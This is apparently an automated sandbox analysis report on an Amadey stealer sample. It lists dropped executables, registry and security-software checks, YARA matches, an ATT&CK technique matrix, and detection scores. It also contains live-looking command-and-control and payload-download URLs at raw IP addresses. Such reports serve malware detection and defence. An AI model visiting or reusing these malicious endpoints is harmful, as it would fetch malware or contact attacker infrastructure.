Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\_tkinter.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI51562\tcl\encoding VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\certifi VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info\licenses VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI27842\cryptography-44.0.0.dist-info\licenses VolumeInformation

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Code function: 0_2_0034CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_0034CBEA

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_005F65E0 LookupAccountNameA,

6_2_005F65E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_00632517 GetTimeZoneInformation,

6_2_00632517

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: rsn.exe, 00000009.00000002.3342683547.0000000001092000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files (x86)\Malwarebytes\Anti-Malware\mbam.exe
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
Source: rsn.exe, 00000009.00000002.3346902558.0000000003CD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: None of the files C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe or C:\Program Files (x86)\Malwarebytes\Anti-Malware\mbam.exe
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3346902558.0000000003D7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344182123.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files (x86)\Malwarebytes\Anti-Malware\mbam.exe

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.skotes.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.skotes.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Fi3ptS6O8D.exe.330000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2169826889.00000000005F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3342429805.00000000005F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2158787674.00000000005F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2140865774.0000000000331000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0061EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		6_2_0061EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0061DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		6_2_0061DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Scheduled Task/Job	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	1 Registry Run Keys / Startup Folder	11 Software Packing	NTDS	226 System Information Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	671 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Fi3ptS6O8D.exe	66%	ReversingLabs	Win32.Infostealer.Tinba
Fi3ptS6O8D.exe	61%	Virustotal		Browse
Fi3ptS6O8D.exe	100%	Avira	TR/Crypt.TPM.Gen
Fi3ptS6O8D.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\rsn[1].exe	9%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\wfhVWWv[1].exe	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	9%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\Cryptodome\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_cffi_backend.cp310-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_pytransform.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27842\_socket.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.faqs.org/rfcs/rfc2822.html	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php32	100%	Avira URL Cloud	malware
http://31.41.244.11/files/5979055508/wfhVWWv.exes$	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5979055508/wfhVWWv.exeXYZ0123456789	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5979055508/wfhVWWv.exeMa	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5979055508/wfhVWWv.exeD	0%	Avira URL Cloud	safe
http://31.41.244.11/files/59	0%	Avira URL Cloud	safe
ftp://http://HTTP/1.0	0%	Avira URL Cloud	safe
https://fluid-draw.sourceforge.io/m	0%	Avira URL Cloud	safe
http://31.41.244.11/files/5979055508/wfhVWWv.exe	100%	Avira URL Cloud	phishing
https://fluid-draw.sourceforge.io/rsn.exe8012	0%	Avira URL Cloud	safe
http://ocsp.digi	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpy	100%	Avira URL Cloud	malware
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpnu	100%	Avira URL Cloud	malware
